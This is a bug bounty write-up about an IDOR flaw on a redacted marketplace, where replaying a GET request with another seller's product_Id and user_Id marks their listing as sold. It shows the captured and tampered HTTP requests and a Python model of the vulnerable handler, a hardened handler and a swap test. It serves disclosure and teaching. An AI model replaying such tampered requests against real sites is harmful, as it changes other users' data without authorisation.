($$$) IDOR via GET Request That Can Mark Every User's Products as "SOLD"
Hi everyone,
In this article I want to share a finding from a private program on HackerOne that is quite unusual.
Let's take a minute to look at it :)
While hunting on a private program on HackerOne, I came across the in-scope asset https://redacted.com/, a marketplace site.
Note:
The program's scope is confidential, so the target is written as "Redacted" throughout.
On that site I first traced how the application processes requests, and only once I understood the flow did I start hunting for bugs.
One thing stood out: the application performs state-changing actions via GET rather than POST.
That alone is not a vulnerability, but if you test APIs regularly it is a signal worth noting: a state change behind a plain link is easy to replay and tamper with.
The finding concerns the request sent when a seller marks a product as "SOLD".
Here is a snippet of the request:
GET /product?product_Id=125&user_Id=1338&Access=sold HTTP/2
Host: www.redacted.com
Cookie: *******
User-Agent: *******
Referer: https://www.redacted.com/product?product_id=125
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Let's break down the parameters:
1. product_Id
Identifies the product the request acts on.
2. user_Id
Identifies the owner of the product; the server uses it to decide whose product is being updated, which makes it the parameter to watch.
3. Access
Specifies the action to perform, here sold.
With that understood, let's test the feature :)
First, I created two accounts, each in a different browser, as Attacker and Victim, and created a product with each of them.
Here are the product URLs:
a. Attacker
https://www.redacted.com/product?product_Id=125
b. Victim
https://www.redacted.com/product?product_Id=123
Now, from the Attacker account, capture the request sent when the attacker marks their own product as sold (the request shown earlier: product_Id=125, user_Id=1338). Then replace product_Id and user_Id with the Victim's values and replay it, keeping the Attacker's session cookie.
Here is the replayed request:
GET /product?product_Id=123&user_Id=1337&Access=sold HTTP/2
Host: www.redacted.com
Cookie: *******
User-Agent: *******
Referer: https://www.redacted.com/product?product_id=125
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
The server accepts it and the Victim's product is marked as sold. Ownership is decided purely from the client-supplied user_Id, which is never compared with the account behind the session cookie, and because product and user IDs are plain numbers, the same request can be repeated against any product on the site.
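To make the flaw and its fix concrete, here is an added example; it is not code from the original post or from the affected site, whose back end is unknown. It models a handler that trusts user_Id from the query string the way the write-up describes, a hardened handler that derives ownership from the authenticated session and requires POST, and the two-account swap test from the steps above, driven by the two request lines captured in the post. The mapping of account 1338 to product 125 and account 1337 to product 123 is an assumption read off the captured requests.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit, parse_qs

# Constructed test data. The numbers come from the captured requests in the
# write-up; which account owns which product is an assumption for this example:
# the Attacker (user 1338) owns product 125, the Victim (user 1337) owns 123.
def fresh_products():
    return {
        125: {"owner": 1338, "status": "available"},
        123: {"owner": 1337, "status": "available"},
    }

# Request lines as captured in the write-up (baseline, then the tampered replay).
BASELINE_LINE = "GET /product?product_Id=125&user_Id=1338&Access=sold HTTP/2"
TAMPERED_LINE = "GET /product?product_Id=123&user_Id=1337&Access=sold HTTP/2"

@dataclass
class Request:
    method: str
    path: str
    params: dict       # flattened query string
    session_user: int  # account identified by the Cookie header, resolved server-side

def parse_request_line(line):
    """Split 'GET /product?a=1&b=2 HTTP/2' into (method, path, {a: '1', b: '2'})."""
    method, target, _version = line.split()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return method, parts.path, params

def vulnerable_handler(req, products):
    """Models the behaviour the write-up describes: ownership is decided from the
    client-supplied user_Id, which is never compared with the session user."""
    product = products.get(int(req.params["product_Id"]))
    if product is None:
        return 404
    if product["owner"] != int(req.params["user_Id"]):
        return 403  # trivially bypassed: the attacker just sends the victim's user_Id
    if req.params.get("Access") == "sold":
        product["status"] = "sold"
        return 200
    return 400

def hardened_handler(req, products):
    """Ownership comes from the authenticated session, never from the query string,
    and the state change requires POST so it cannot be triggered by a plain link."""
    if req.method != "POST":
        return 405
    product = products.get(int(req.params["product_Id"]))
    # Same response for "missing" and "not yours" so product IDs cannot be enumerated.
    if product is None or product["owner"] != req.session_user:
        return 404
    if req.params.get("Access") == "sold":
        product["status"] = "sold"
        return 200
    return 400

def idor_swap_test(handler, method):
    """The two-account test from the write-up: send the attacker's legitimate
    request, then the same request with the victim's identifiers substituted,
    both from the attacker's session (user 1338). Returns both status codes and
    the final state of the victim's product."""
    products = fresh_products()
    results = {}
    for label, line in (("baseline", BASELINE_LINE), ("tampered", TAMPERED_LINE)):
        _, path, params = parse_request_line(line)
        req = Request(method=method, path=path, params=params, session_user=1338)
        results[label] = handler(req, products)
    results["victim_product"] = products[123]["status"]
    return results

if __name__ == "__main__":
    print("vulnerable, GET :", idor_swap_test(vulnerable_handler, "GET"))
    print("hardened,   POST:", idor_swap_test(hardened_handler, "POST"))
    print("hardened,   GET :", idor_swap_test(hardened_handler, "GET"))
```

Against the vulnerable handler the tampered request succeeds and the victim's product flips to sold; against the hardened handler it is rejected and the product is untouched. The essential property of the fix is that nothing the client sends decides whose product is modified: the user_Id parameter becomes dead weight and can be dropped from the endpoint entirely, and returning the same 404 for "does not exist" and "not yours" keeps the numeric IDs from being used as an oracle.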
Timeline:
Report: Mar 1st, 2022
Fix: Mar 8th, 2022
Bounty: $$$